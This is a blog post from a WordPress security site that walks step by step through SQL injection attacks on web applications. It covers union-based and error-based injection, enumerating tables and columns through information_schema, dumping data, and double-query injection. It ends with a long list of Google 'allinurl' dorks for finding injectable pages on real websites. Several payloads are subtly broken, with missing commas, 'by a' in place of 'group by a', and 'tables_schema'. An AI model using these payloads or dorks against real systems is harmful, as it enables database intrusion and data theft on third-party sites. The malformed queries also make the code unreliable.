[security.pimp]

..technology..security..information..freedom..

SQLi.everything

This page is a bit different than others as it will walk thru various SQLi type of attack scenario’s

To get simple SQLi syntax for various queries please refer to one of the online resources shown below.

—————— Online Resources

Absolute Best Resource for SQLi Cheat Sheets
http://pentestmonkey.net/category/cheat-sheet/sql-injection

Injection & Encoding validation tester

http://ha.ckers.org/sqlinjection

—————— Basic Input Validation Checks

Try all of the following combinations for any user supplied values

< ! # = / . ” ‘ – + > and [a-zA-Z0-9]
ex:
value=value’ AND 1=1%20–+

( MySQL = End Statement –+  closes the query )

=======================================| SQLi Example Walkthru |
——————- ERROR BASED SQLi

Let’s find a query to disect usually will look like this

?value=your-input

Now lets FUZZ the input with some common values

?value=[ ( ‘ ” / \ . > < | ! ^ $ %20 %23
?value=some-long-string
?value=letters-and-123
?value=123456789

After seeing the page return at least 2 values based on our request we can visualize this SQL

SELECT something, and something2 FROM TABLE WHERE value=’our input’

Based on this we can try various escape characters to test sanitation
Weak validation we can expect to find these types of escape characters

SELECT something, and something2 FROM TABLE WHERE id=’our input’ Exploit with ‘ –+
SELECT something, and something2 FROM TABLE WHERE id=(‘our input’) Exploit with ‘) –+
SELECT something, and something2 FROM TABLE WHERE id=(“our input”) Exploit with “) –+

We can then assume our injection point will always be at a set point in the query

SELECT something, and something2 FROM TABLE WHERE value=’our input”OUR SQL CODE –+

————————– ENUMERATION
Interate thru the query values to figure out all the Colums requested in this query
Run this query increasing 1-10 each time until you get an error

‘ ORDER BY 1-10 –+

If we find 3 colums we know we are seeing this action request 3 items

SELECT Something1, Something2, Something3 FROM TABLE WHERE id=’our input’

So now we try to create an SQL union to select some other data
(A union select must have the same number of colums in the request so if our injection point has 3 colums so must our union)

‘ UNION SELECT 1,2,3 –+
(this should allow the first query to finish but not the union select, but we get no error

fake-value-to-break-first-query’ UNION SELECT 1,2,3 –+

Now lets check our values again, they should show some info as to which colums in our SELECT are being shown where.

ex: We see our values now as 2 & 3 lets try something like UNION SELECT 1,4,5 if those values are shown back we know colums 2 & 3 of our query are being repeat back to our screen

In the above example when we find a colum lets try to run some functions in it and get info
‘ UNION SELECT 1,version(),database() –+
‘ UNION SELECT 1,currentuser,@@datadir –+

So now we have injection point and some basic info to start data enumeration.
The next thing is to understand the tables in our target DB

This will target the information_schema table this is usually default in MySQL
It contains a table called table_schema which holds table info for all local DB’s

What we are doing here is running 2 seperate sql commands to generate our output.
We have to leave the value of 3 in the statement to have some value for the statement to display in the browser. The info after the 3 is our 2nd part of the query for our colum 2

‘ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=’security’ –+
or
‘ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() –+

Now to interate those tables thru a tight colum we can interate thru with a limit

‘ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1 –+
‘ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() LIMIT 2,1 –+
‘ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() LIMIT 3,1 –+

Keep going until you get no output, that means we got all the tables

Another method to do the same thing is to create a string from it and display that

‘ UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() –+
Let’s create our DB schema info with some reverse engineering. This will help us in building complex queries

database= my-database
tables= table1,table2,table3
columns= ?

Now let’s enumerate the columns as shown below and update our schema info

‘ UNION SELECT 1,column_name, 3 FROM information_schema.columns WHERE table_name=’table1’ –+
or

‘ UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=’table1’ –+

Now we figure we need the info from table1 & columnB so let’s try to dump that info

database= my-database
tables= table1,table2,table3
columns in Table1= columnA, columnB, columnC

Since we know the true names of the DB tables and columns we can cleanup our SQL alot

‘ UNION SELECT 1,group_concat(columnB),3 FROM table1 –+

If we wanted to display info from both visible injection points we can stack queries

‘ UNION SELECT 1,group_concat(columnB),group_concat(columnC) FROM table1 –+
Let’s try the same attack but instead of terminating –+ SQL we just fix the statement

‘ AND ‘1 (this should return true)

Now we can enumerate with our union select method within our query

‘ UNION SELECT 1,2,3 AND ‘1

Once we figure out the number and location of columns we can invalidate the first part of the statement and pull data

BadValue’ UNION SELECT 1,database(),current_user AND ‘1

—————– Double Query, Error Based Blind, Subquery Injection

The concept behind this attack is we cannot output DB queries thru the application page so we pipe them thru full DB error messages that are returned. Basically we nest our SQL in a query that has some randomized parts which will eventually error out after it has collected up some values from the DB

Lets assume our page is similar to this

?id=3

From this page we only see a true or false value returned (it does something or it doesnt)

We can assume the logic looks like this

select col1,col2,col3 from table where id=’ my input ‘

So we break it with our standard methods

?id=3’

And we are greeted with a full SQL error

Now we can start trying to nest our code in the page
For this lets build up a proper query in our MySQL test bed

select database();
select(select database()); We can nest queries in queries
select concat((select database()));
select concat(0x3a,0x3a,(select database())0x3a,0x3a); Now we can obfuscate our ‘ with some hex
select concat(0x3a,0x3a,(select database())0x3a,0x3a)a;

So here we use a trick to add a random # and floor value to flatten it to either 0 or 1. This will randomize our query from true to false

select concat(0x3a,0x3a,(select database())0x3a,0x3a, floor(rand()*2))a; Now lets alias it as a
select concat(0x3a,0x3a,(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables;

So now we have build up a query we can next our SQL into and get the response back. Lets start dumping data

select count(*), concat(0x3a,0x3a,(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select version())0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select user())0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where tables_schema=database() limit 1,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where tables_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where
tables_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;
select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where tables_schema=database() limit 3,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a;

Now that we have a good query to grab data let’s clean it up for the front end injection

So we have this

?id=1′ AND (select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where tables_schema=database() limit 3,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a)

If we find our page only is returning 1 column of data instead of the amount we have (count,concat, select) we can shove it into another single select statement and pull the data from there

?id=1’ AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name FROM information_schema.tables where tables_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))a from information_schema.columns by a)b)

_______________________________________________________________________[ Finding SQLi with Google ]

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Blog at WordPress.com.

%d bloggers like this: